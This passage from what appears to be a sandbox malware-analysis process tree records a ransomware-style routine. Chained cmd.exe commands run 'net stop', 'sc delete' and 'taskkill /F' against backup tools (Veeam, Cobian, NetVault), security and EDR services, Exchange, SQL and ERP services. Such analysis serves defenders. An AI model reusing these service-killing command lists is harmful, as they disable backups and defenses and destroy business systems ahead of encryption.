      sc delete "ReportServer$SQLEXPRESS"
      4⤵
      PID:5948
  - - C:\Windows\SysWOW64\sc.exe
      sc delete TongBackupSrv
      4⤵
      PID:6064
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM TongBackupSrv.exe /F
      4⤵
      PID:5604
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM UFMsgCenterService.exe /F
      4⤵
      PID:5912
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM "Cobian.exe" /F
      4⤵
      PID:5984
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM "SAP Business One.exe" /F
      4⤵
      PID:5584
  - - C:\Windows\SysWOW64\net.exe
      net stop "SQLBackupAndFTP Client Service"
      4⤵
      PID:5872
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "SQLBackupAndFTP Client Service"
        5⤵
        
        PID:3540
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM "SqlBak.Service.exe" /F
      4⤵
      PID:3436
  - - C:\Windows\SysWOW64\net.exe
      net stop cbVSCService
      4⤵
      PID:2348
  - - C:\Windows\SysWOW64\net.exe
      net stop "SAP Business One RSP Agent Service"
      4⤵
      PID:5952
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "SAP Business One RSP Agent Service"
        5⤵
        
        PID:5008
  - - C:\Windows\SysWOW64\net.exe
      net stop SAPB1iDIProxy
      4⤵
      PID:5848
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SAPB1iDIProxy
        5⤵
        
        PID:5708
  - - C:\Windows\SysWOW64\net.exe
      net stop "SAPB1iDIProxy_Monitor"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4588
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "SAPB1iDIProxy_Monitor"
        5⤵
        
        PID:4360
  - - C:\Windows\SysWOW64\net.exe
      net stop SAPB1iEventSender
      4⤵
      PID:5860
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SAPB1iEventSender
        5⤵
        
        PID:5740
  - - C:\Windows\SysWOW64\net.exe
      net stop SBOClientAgent
      4⤵
      PID:5728
  - - C:\Windows\SysWOW64\net.exe
      net stop SBODI_Server
      4⤵
      PID:1652
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SBODI_Server
        5⤵
        
        PID:5216
  - - C:\Windows\SysWOW64\net.exe
      net stop SBOJobServiceBackEnd
      4⤵
      PID:1032
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SBOJobServiceBackEnd
        5⤵
        
        PID:5460
  - - C:\Windows\SysWOW64\net.exe
      net stop SBOMail
      4⤵
      PID:1584
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SBOMail
        5⤵
        
        PID:5952
  - - C:\Windows\SysWOW64\net.exe
      net stop SBOWFDataAccess
      4⤵
      PID:5284
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SBOWFDataAccess
        5⤵
        
        PID:2676
  - - C:\Windows\SysWOW64\net.exe
      net stop SBOWorkflowEngine
      4⤵
      PID:3192
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SBOWorkflowEngine
        5⤵
        
        PID:5848
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "@color b & sc delete MSCRMAsyncService & @sc delete REPLICA & @sc delete RTCATS & @sc delete RTCAVMCU & @sc delete RtcQms & @sc delete RTCMEETINGMCU & @sc delete RTCIMMCU & @sc delete RTCDATAMCU & @sc delete RTCCDR & @sc delete ProjectEventService16 & @sc delete ProjectQueueService16 & @sc delete SPAdminV4 & @sc delete SPSearchHostController & @sc delete SPTimerV4 & @sc delete SPTraceV4 & @sc delete OSearch16 & @sc delete ProjectCalcService16 & @sc delete c2wts & @sc delete AppFabricCachingService & @sc delete ADWS & @sc delete MotionBoard57 & @sc delete MotionBoardRCService57 & @sc delete vsvnjobsvc & @sc delete VisualSVNServer & @sc delete "FlexNet Licensing Service 64" & @sc delete BestSyncSvc & @sc delete LPManager & @sc delete MediatekRegistryWriter & @sc delete RaAutoInstSrv_RT2870 & @sc delete CobianBackup10 & @sc delete SQLANYs_sem5 & @sc delete CASLicenceServer & @sc delete SQLService & @sc delete semwebsrv & @sc delete TbossSystem & @sc delete ErpEnvSvc & @sc delete Mysoft.Autoupgrade.DispatchService & @sc delete Mysoft.Autoupgrade.UpdateService & @sc delete Mysoft.Config.WindowsService & @sc delete Mysoft.DataCenterService & @sc delete Mysoft.SchedulingService & @sc delete Mysoft.Setup.InstallService & @sc delete MysoftUpdate & @sc delete edr_monitor & @sc delete abs_deployer & @sc delete savsvc & @sc delete ShareBoxMonitorService & @sc delete ShareBoxService & @sc delete CloudExchangeService & @sc delete "U8WorkerService2" & @sc delete CIS & @sc delete EASService & @sc delete KICkSvr & @sc delete "OSP Service" & @sc delete U8SmsSrv & @sc delete OfficeClearCache & @sc delete TurboCRM70 & @sc delete U8DispatchService & @sc delete U8EISService & @sc delete U8EncryptService & @sc delete U8GCService & @sc delete U8KeyManagePool & @sc delete "U8MPool" & @sc delete U8SCMPool & @sc delete U8SLReportService & @sc delete U8TaskService & @sc delete "U8WebPool" & @sc delete UFAllNet & @sc delete UFReportService & @sc delete UTUService & @sc delete "U8WorkerService1""
    3⤵
    PID:1968
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MSCRMAsyncService
      4⤵
      PID:5728
  - - C:\Windows\SysWOW64\sc.exe
      sc delete REPLICA
      4⤵
      PID:5672
  - - C:\Windows\SysWOW64\sc.exe
      sc delete RTCATS
      4⤵
      PID:6076
  - - C:\Windows\SysWOW64\sc.exe
      sc delete RTCAVMCU
      4⤵
      Launches sc.exe
      PID:4340
  - - C:\Windows\SysWOW64\sc.exe
      sc delete RtcQms
      4⤵
      PID:5472
  - - C:\Windows\SysWOW64\sc.exe
      sc delete RTCMEETINGMCU
      4⤵
      PID:5268
  - - C:\Windows\SysWOW64\sc.exe
      sc delete RTCIMMCU
      4⤵
      Launches sc.exe
      PID:5788
  - - C:\Windows\SysWOW64\sc.exe
      sc delete RTCDATAMCU
      4⤵
      PID:2156
  - - C:\Windows\SysWOW64\sc.exe
      sc delete RTCCDR
      4⤵
      PID:2420
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ProjectEventService16
      4⤵
      Launches sc.exe
      PID:5928
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ProjectQueueService16
      4⤵
      PID:5692
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SPAdminV4
      4⤵
      PID:5724
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SPSearchHostController
      4⤵
      PID:5652
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SPTimerV4
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3996
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SPTraceV4
      4⤵
      Launches sc.exe
      PID:4588
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OSearch16
      4⤵
      PID:1652
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ProjectCalcService16
      4⤵
      Launches sc.exe
      PID:2976
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeDelivery
        5⤵
        
        PID:3568
  - - C:\Windows\SysWOW64\sc.exe
      sc delete c2wts
      4⤵
      Launches sc.exe
      PID:5404
  - - C:\Windows\SysWOW64\sc.exe
      sc delete AppFabricCachingService
      4⤵
      PID:5248
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ADWS
      4⤵
      Launches sc.exe
      PID:5416
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MotionBoard57
      4⤵
      PID:1588
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MotionBoardRCService57
      4⤵
      PID:2268
  - - C:\Windows\SysWOW64\sc.exe
      sc delete vsvnjobsvc
      4⤵
      PID:5200
  - - C:\Windows\SysWOW64\sc.exe
      sc delete VisualSVNServer
      4⤵
      PID:5788
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "FlexNet Licensing Service 64"
      4⤵
      PID:5944
  - - C:\Windows\SysWOW64\sc.exe
      sc delete BestSyncSvc
      4⤵
      PID:5712
  - - C:\Windows\SysWOW64\sc.exe
      sc delete LPManager
      4⤵
      PID:1000
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MediatekRegistryWriter
      4⤵
      PID:6072
  - - C:\Windows\SysWOW64\sc.exe
      sc delete RaAutoInstSrv_RT2870
      4⤵
      PID:5408
  - - C:\Windows\SysWOW64\sc.exe
      sc delete CobianBackup10
      4⤵
      PID:5940
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SQLANYs_sem5
      4⤵
      Launches sc.exe
      PID:5436
  - - C:\Windows\SysWOW64\sc.exe
      sc delete CASLicenceServer
      4⤵
      PID:5164
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SQLService
      4⤵
      Launches sc.exe
      PID:6092
  - - C:\Windows\SysWOW64\sc.exe
      sc delete semwebsrv
      4⤵
      Launches sc.exe
      PID:5364
  - - C:\Windows\SysWOW64\sc.exe
      sc delete TbossSystem
      4⤵
      PID:5340
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ErpEnvSvc
      4⤵
      PID:5824
  - - C:\Windows\SysWOW64\sc.exe
      sc delete Mysoft.Autoupgrade.DispatchService
      4⤵
      PID:1608
  - - C:\Windows\SysWOW64\sc.exe
      sc delete Mysoft.Autoupgrade.UpdateService
      4⤵
      PID:5592
  - - C:\Windows\SysWOW64\sc.exe
      sc delete Mysoft.Config.WindowsService
      4⤵
      PID:3544
  - - C:\Windows\SysWOW64\sc.exe
      sc delete Mysoft.DataCenterService
      4⤵
      PID:6032
  - - C:\Windows\SysWOW64\sc.exe
      sc delete Mysoft.SchedulingService
      4⤵
      PID:4476
  - - C:\Windows\SysWOW64\sc.exe
      sc delete Mysoft.Setup.InstallService
      4⤵
      PID:5612
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MysoftUpdate
      4⤵
      Launches sc.exe
      PID:2156
  - - C:\Windows\SysWOW64\sc.exe
      sc delete edr_monitor
      4⤵
      PID:5636
  - - C:\Windows\SysWOW64\sc.exe
      sc delete abs_deployer
      4⤵
      PID:5440
  - - C:\Windows\SysWOW64\sc.exe
      sc delete savsvc
      4⤵
      Launches sc.exe
      PID:5452
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ShareBoxMonitorService
      4⤵
      PID:6124
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ShareBoxService
      4⤵
      Launches sc.exe
      PID:1568
  - - C:\Windows\SysWOW64\sc.exe
      sc delete CloudExchangeService
      4⤵
      PID:4244
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "U8WorkerService2"
      4⤵
      Launches sc.exe
      PID:5684
  - - C:\Windows\SysWOW64\sc.exe
      sc delete CIS
      4⤵
      PID:1336
  - - C:\Windows\SysWOW64\sc.exe
      sc delete EASService
      4⤵
      PID:2504
  - - C:\Windows\SysWOW64\sc.exe
      sc delete KICkSvr
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3848
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "OSP Service"
      4⤵
      PID:5336
  - - C:\Windows\SysWOW64\sc.exe
      sc delete U8SmsSrv
      4⤵
      PID:3540
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OfficeClearCache
      4⤵
      PID:5288
  - - C:\Windows\SysWOW64\sc.exe
      sc delete TurboCRM70
      4⤵
      PID:6888
  - - C:\Windows\SysWOW64\sc.exe
      sc delete U8DispatchService
      4⤵
      PID:5492
  - - C:\Windows\SysWOW64\sc.exe
      sc delete U8EISService
      4⤵
      PID:1056
  - - C:\Windows\SysWOW64\sc.exe
      sc delete U8EncryptService
      4⤵
      PID:6792
  - - C:\Windows\SysWOW64\sc.exe
      sc delete U8GCService
      4⤵
      Launches sc.exe
      PID:8096
  - - C:\Windows\SysWOW64\sc.exe
      sc delete U8KeyManagePool
      4⤵
      PID:6164
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "U8MPool"
      4⤵
      PID:804
  - - C:\Windows\SysWOW64\sc.exe
      sc delete U8SCMPool
      4⤵
      PID:6168
  - - C:\Windows\SysWOW64\sc.exe
      sc delete U8SLReportService
      4⤵
      PID:7152
  - - C:\Windows\SysWOW64\sc.exe
      sc delete U8TaskService
      4⤵
      PID:7216
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "U8WebPool"
      4⤵
      PID:8000
  - - C:\Windows\SysWOW64\sc.exe
      sc delete UFAllNet
      4⤵
      PID:3836
  - - C:\Windows\SysWOW64\sc.exe
      sc delete UFReportService
      4⤵
      PID:5760
  - - C:\Windows\SysWOW64\sc.exe
      sc delete UTUService
      4⤵
      Launches sc.exe
      PID:1312
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "U8WorkerService1"
      4⤵
      Launches sc.exe
      PID:7560
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color a & @net stop HaoZipSvc & @net stop "igfxCUIService2.0.0.0" & @net stop Realtek11nSU & @net stop xenlite & @net stop XenSvc & @net stop Apache2.2 & @net stop "Synology Drive VSS Service x64" & @net stop DellDRLogSvc & @net stop FirebirdGuardianDeafaultInstance & @net stop JWEM3DBAUTORun & @net stop JWRinfoClientService & @net stop JWService & @net stop Service2 & @net stop RapidRecoveryAgent & @net stop FirebirdServerDefaultInstance & @net stop AdobeARMservice & @net stop VeeamCatalogSvc & @net stop VeeanBackupSvc & @net stop VeeamTransportSvc & @net stop TPlusStdAppService1300 & @net stop TPlusStdTaskService1300 & @net stop TPlusStdUpgradeService1300 & @net stop TPlusStdWebService1300 & @net stop VeeamNFSSvc & @net stop VeeamDeploySvc & @net stop VeeamCloudSvc & @net stop VeeamMountSvc & @net stop VeeamBrokerSvc & @net stop VeeamDistributionSvc & @net stop tmlisten & @net stop ServiceMid & @net stop 360EntPGSvc & @net stop ClickToRunSvc & @net stop RavTask & @net stop AngelOfDeath & @net stop d_safe & @net stop NFLicenceServer & @net stop "NetVault Process Manager" & @net stop RavService & @net stop DFServ & @net stop IngressMgr & @net stop EvtSys & @net stop K3ClouManager & @net stop NFVPrintServer & @net stop RTCAVMCU & @net stop CobianBackup10 & @net stop GNWebService & @net stop Mysoft.SchedulingService & @net stop AgentX & @net stop SentinelKeysServer & @net stop DGPNPSEV & @net stop TurboCRM70 & @net stop NFSysService & @net stop U8DispatchService & @net stop NFOTPService & @net stop U8EISService & @net stop U8EncryptService & @net stop U8GCService & @net stop U8KeyManagePool & @net stop U8MPool & @net stop U8SCMPool & @net stop U8SLReportService & @net stop U8TaskService & @net stop U8WebPool & @net stop UFAllNet & @net stop UFReportService & @net stop UTUService"
    3⤵
    PID:3572
  - - C:\Windows\SysWOW64\net.exe
      net stop HaoZipSvc
      4⤵
      PID:5348
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop HaoZipSvc
        5⤵
        
        PID:5864
  - - C:\Windows\SysWOW64\net.exe
      net stop "igfxCUIService2.0.0.0"
      4⤵
      PID:1396
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "igfxCUIService2.0.0.0"
        5⤵
        
        PID:5192
  - - C:\Windows\SysWOW64\net.exe
      net stop Realtek11nSU
      4⤵
      PID:5424
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop Realtek11nSU
        5⤵
        
        PID:968
  - - C:\Windows\SysWOW64\net.exe
      net stop xenlite
      4⤵
      PID:5948
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop xenlite
        5⤵
        
        PID:6052
  - - C:\Windows\SysWOW64\net.exe
      net stop XenSvc
      4⤵
      PID:5500
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop XenSvc
        5⤵
        
        PID:1268
  - - C:\Windows\SysWOW64\net.exe
      net stop Apache2.2
      4⤵
      PID:5640
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop Apache2.2
        5⤵
        
        PID:5556
  - - C:\Windows\SysWOW64\net.exe
      net stop "Synology Drive VSS Service x64"
      4⤵
      PID:5848
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Synology Drive VSS Service x64"
        5⤵
        
        PID:1204
  - - C:\Windows\SysWOW64\net.exe
      net stop DellDRLogSvc
      4⤵
      PID:5416
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop DellDRLogSvc
        5⤵
        
        PID:5044
  - - C:\Windows\SysWOW64\net.exe
      net stop FirebirdGuardianDeafaultInstance
      4⤵
      PID:4376
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop FirebirdGuardianDeafaultInstance
        5⤵
        
        PID:5312
  - - C:\Windows\SysWOW64\net.exe
      net stop JWEM3DBAUTORun
      4⤵
      PID:5944
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop JWEM3DBAUTORun
        5⤵
        
        PID:4368
  - - C:\Windows\SysWOW64\net.exe
      net stop JWRinfoClientService
      4⤵
      PID:4800
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop JWRinfoClientService
        5⤵
        
        PID:4560
  - - C:\Windows\SysWOW64\net.exe
      net stop JWService
      4⤵
      PID:5632
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop JWService
        5⤵
        
        PID:1816
  - - C:\Windows\SysWOW64\net.exe
      net stop Service2
      4⤵
      PID:5544
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop Service2
        5⤵
        
        PID:940
  - - C:\Windows\SysWOW64\net.exe
      net stop RapidRecoveryAgent
      4⤵
      PID:4480
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop RapidRecoveryAgent
        5⤵
        
        PID:2348
  - - C:\Windows\SysWOW64\net.exe
      net stop FirebirdServerDefaultInstance
      4⤵
      PID:5692
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop FirebirdServerDefaultInstance
        5⤵
        
        PID:4376
  - - C:\Windows\SysWOW64\net.exe
      net stop AdobeARMservice
      4⤵
      PID:5408
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop AdobeARMservice
        5⤵
        
        PID:5700
  - - C:\Windows\SysWOW64\net.exe
      net stop VeeamCatalogSvc
      4⤵
      PID:5844
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeamCatalogSvc
        5⤵
        
        PID:6116
  - - C:\Windows\SysWOW64\net.exe
      net stop VeeanBackupSvc
      4⤵
      PID:1568
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeanBackupSvc
        5⤵
        
        PID:4800
  - - C:\Windows\SysWOW64\net.exe
      net stop VeeamTransportSvc
      4⤵
      PID:5556
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeamTransportSvc
        5⤵
        
        PID:5856
  - - C:\Windows\SysWOW64\net.exe
      net stop TPlusStdAppService1300
      4⤵
      PID:5512
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop TPlusStdAppService1300
        5⤵
        
        PID:3472
  - - C:\Windows\SysWOW64\net.exe
      net stop TPlusStdTaskService1300
      4⤵
      PID:2516
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop TPlusStdTaskService1300
        5⤵
        
        PID:4612
  - - C:\Windows\SysWOW64\net.exe
      net stop TPlusStdUpgradeService1300
      4⤵
      PID:872
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop TPlusStdUpgradeService1300
        5⤵
        
        PID:5756
  - - C:\Windows\SysWOW64\net.exe
      net stop TPlusStdWebService1300
      4⤵
      PID:4504
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop TPlusStdWebService1300
        5⤵
        
        PID:5912
  - - C:\Windows\SysWOW64\net.exe
      net stop VeeamNFSSvc
      4⤵
      PID:6040
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeamNFSSvc
        5⤵
        
        PID:6092
  - - C:\Windows\SysWOW64\net.exe
      net stop VeeamDeploySvc
      4⤵
      PID:1816
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeamDeploySvc
        5⤵
        
        PID:5880
  - - C:\Windows\SysWOW64\net.exe
      net stop VeeamCloudSvc
      4⤵
      PID:5932
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeamCloudSvc
        5⤵
        
        PID:4436
  - - C:\Windows\SysWOW64\net.exe
      net stop VeeamMountSvc
      4⤵
      PID:2660
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeamMountSvc
        5⤵
        
        PID:7564
  - - C:\Windows\SysWOW64\net.exe
      net stop VeeamBrokerSvc
      4⤵
      PID:964
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeamBrokerSvc
        5⤵
        
        PID:3376
  - - C:\Windows\SysWOW64\net.exe
      net stop VeeamDistributionSvc
      4⤵
      PID:4280
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeamDistributionSvc
        5⤵
        
        PID:7644
  - - C:\Windows\SysWOW64\net.exe
      net stop tmlisten
      4⤵
      PID:7924
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop tmlisten
        5⤵
        
        PID:7548
  - - C:\Windows\SysWOW64\net.exe
      net stop ServiceMid
      4⤵
      PID:2284
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop ServiceMid
        5⤵
        
        PID:7272
  - - C:\Windows\SysWOW64\net.exe
      net stop 360EntPGSvc
      4⤵
      PID:5800
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop 360EntPGSvc
        5⤵
        
        PID:7464
  - - C:\Windows\SysWOW64\net.exe
      net stop ClickToRunSvc
      4⤵
      PID:5660
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop ClickToRunSvc
        5⤵
        
        PID:5900
  - - C:\Windows\SysWOW64\net.exe
      net stop RavTask
      4⤵
      PID:7204
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop RavTask
        5⤵
        
        PID:6984
  - - C:\Windows\SysWOW64\net.exe
      net stop AngelOfDeath
      4⤵
      PID:7392
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop AngelOfDeath
        5⤵
        
        PID:6184
  - - C:\Windows\SysWOW64\net.exe
      net stop d_safe
      4⤵
      PID:6308
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop d_safe
        5⤵
        
        PID:4972
  - - C:\Windows\SysWOW64\net.exe
      net stop NFLicenceServer
      4⤵
      PID:5088
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop NFLicenceServer
        5⤵
        
        PID:6908
  - - C:\Windows\SysWOW64\net.exe
      net stop "NetVault Process Manager"
      4⤵
      PID:6152
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "NetVault Process Manager"
        5⤵
        
        PID:7676
  - - C:\Windows\SysWOW64\net.exe
      net stop RavService
      4⤵
      PID:3896
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop RavService
        5⤵
        
        PID:7304
  - - C:\Windows\SysWOW64\net.exe
      net stop DFServ
      4⤵
      PID:1788
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop DFServ
        5⤵
        
        PID:7944
  - - C:\Windows\SysWOW64\net.exe
      net stop IngressMgr
      4⤵
      PID:6392
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop IngressMgr
        5⤵
        
        PID:6176
  - - C:\Windows\SysWOW64\net.exe
      net stop EvtSys
      4⤵
      PID:3988
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop EvtSys
        5⤵
        
        PID:6544
  - - C:\Windows\SysWOW64\net.exe
      net stop K3ClouManager
      4⤵
      PID:4504
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop K3ClouManager
        5⤵
        
        PID:7908
  - - C:\Windows\SysWOW64\net.exe
      net stop NFVPrintServer
      4⤵
      PID:5844
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop NFVPrintServer
        5⤵
        
        PID:7756
  - - C:\Windows\SysWOW64\net.exe
      net stop RTCAVMCU
      4⤵
      PID:3676
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop RTCAVMCU
        5⤵
        
        PID:6172
  - - C:\Windows\SysWOW64\net.exe
      net stop CobianBackup10
      4⤵
      PID:6664
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop CobianBackup10
        5⤵
        
        PID:7048
  - - C:\Windows\SysWOW64\net.exe
      net stop GNWebService
      4⤵
      PID:3688
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop GNWebService
        5⤵
        
        PID:5908
  - - C:\Windows\SysWOW64\net.exe
      net stop Mysoft.SchedulingService
      4⤵
      PID:7148
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color a & @net stop U8WorkerService1 & @net stop U8WorkerService2 & @net stop "memcached Server" & @net stop Apache2.4 & @net stop UFIDAWebService & @net stop MSComplianceAudit & @net stop MSExchangeADTopology & @net stop MSExchangeAntispamUpdate & @net stop MSExchangeCompliance & @net stop MSExchangeDagMgmt & @net stop MSExchangeDelivery & @net stop MSExchangeDiagnostics & @net stop MSExchangeEdgeSync & @net stop MSExchangeFastSearch & @net stop MSExchangeFrontEndTransport & @net stop MSExchangeHM & @net stop MSSQL$SQL2008 & @net stop MSExchangeHMRecovery & @net stop MSExchangeImap4 & @net stop MSExchangeIMAP4BE & @net stop MSExchangeIS & @net stop MSExchangeMailboxAssistants & @net stop MSExchangeMailboxReplication & @net stop MSExchangeNotificationsBroker & @net stop MSExchangePop3 & @net stop MSExchangePOP3BE & @net stop MSExchangeRepl & @net stop MSExchangeRPC & @net stop MSExchangeServiceHost & @net stop MSExchangeSubmission & @net stop MSExchangeThrottling & @net stop MSExchangeTransport & @net stop MSExchangeTransportLogSearch & @net stop MSExchangeUM & @net stop MSExchangeUMCR & @net stop MySQL5_OA"
    3⤵
    PID:640
  - - C:\Windows\SysWOW64\net.exe
      net stop U8WorkerService1
      4⤵
      PID:5488
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop U8WorkerService1
        5⤵
        
        PID:5584
  - - C:\Windows\SysWOW64\net.exe
      net stop U8WorkerService2
      4⤵
      PID:5320
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop U8WorkerService2
        5⤵
        
        PID:5580
  - - C:\Windows\SysWOW64\net.exe
      net stop "memcached Server"
      4⤵
      PID:5916
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "memcached Server"
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1828
  - - C:\Windows\SysWOW64\net.exe
      net stop Apache2.4
      4⤵
      PID:5540
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop Apache2.4
        5⤵
        
        PID:5436
  - - C:\Windows\SysWOW64\net.exe
      net stop UFIDAWebService
      4⤵
      PID:5208
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop UFIDAWebService
        5⤵
        
        PID:5564
  - - C:\Windows\SysWOW64\net.exe
      net stop MSComplianceAudit
      4⤵
      PID:5944
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSComplianceAudit
        5⤵
        
        PID:4352
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeADTopology
      4⤵
      PID:4300
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeADTopology
        5⤵
        
        PID:4692
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeAntispamUpdate
      4⤵
      PID:5456
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeAntispamUpdate
        5⤵
        
        PID:5488
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeCompliance
      4⤵
      PID:3388
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeCompliance
        5⤵
        
        PID:4924
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeDagMgmt
      4⤵
      PID:5192
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeDelivery
      4⤵
      PID:2976
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeDiagnostics
      4⤵
      PID:1844
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeEdgeSync
      4⤵
      PID:1440
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeEdgeSync
        5⤵
        
        PID:4612
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeFastSearch
      4⤵
      PID:3388
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeFastSearch
        5⤵
        
        PID:5320
  - - C:\Windows\SysWOW64\net.exe
